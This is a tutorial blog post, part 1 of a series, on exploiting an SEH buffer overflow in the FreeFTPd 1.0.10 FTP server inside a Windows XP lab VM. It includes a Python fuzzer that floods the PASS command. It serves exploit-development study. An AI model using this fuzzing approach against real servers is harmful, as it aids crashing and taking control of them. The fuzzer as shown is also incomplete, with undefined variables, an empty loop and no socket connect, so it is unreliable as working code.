SEH Buffer Overflow - FreeFTPd 1.0.10 - Part 1

SEH Buffer Overflow - FreeFTPd 1.0.10 - Part 1

In this blog post series we will look into exploiting a SEH buffer overflow for the FreeFTPd 1.0.10 application.

Therefore we load the application into the Immunity Debuuger on a Windows XP test vm. This operating system does not use memory protections like ASLR to protect from simple buffer overflow attacks.

We use this fuzzer to test for the buffer overflow to verify the exploit code and write our own exploit code.

# -*- coding: utf-8 -*-
import sys
import socket

if __name__ == "__main__":
    buffer_inc = 5000
    buffercount = maxbuffersize / buffer_inc
    IPV4='' # IP of the windows xp VM
    PORT=21 # running process

    while len(bufferarray)< buffercount+1:

    for buffer in bufferarray:
        CLIENT = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
        print("Fuzzing with %4d"%len(buffer))
        CLIENT.send('USER anonymous\r\n')
        data = CLIENT.recv(BUFFERSIZE)
        print("data: %s"%data)
        CLIENT.send('PASS '+buffer+'\r\n')
        data = CLIENT.recv(BUFFERSIZE)
        print("data: %s"%data)

After running said script with the right IPV4 and PORTwe will get an overflow which will look like:

Overflow Address

And in the registers we will see something like:

Registers View

We can now also verify that it in fact is a SEH overflow by opening the SEH chain for the exception:

SEH Chain

We already overwrote the SEH return address with the current buffer. Now we only need to find the offsets for said addresses.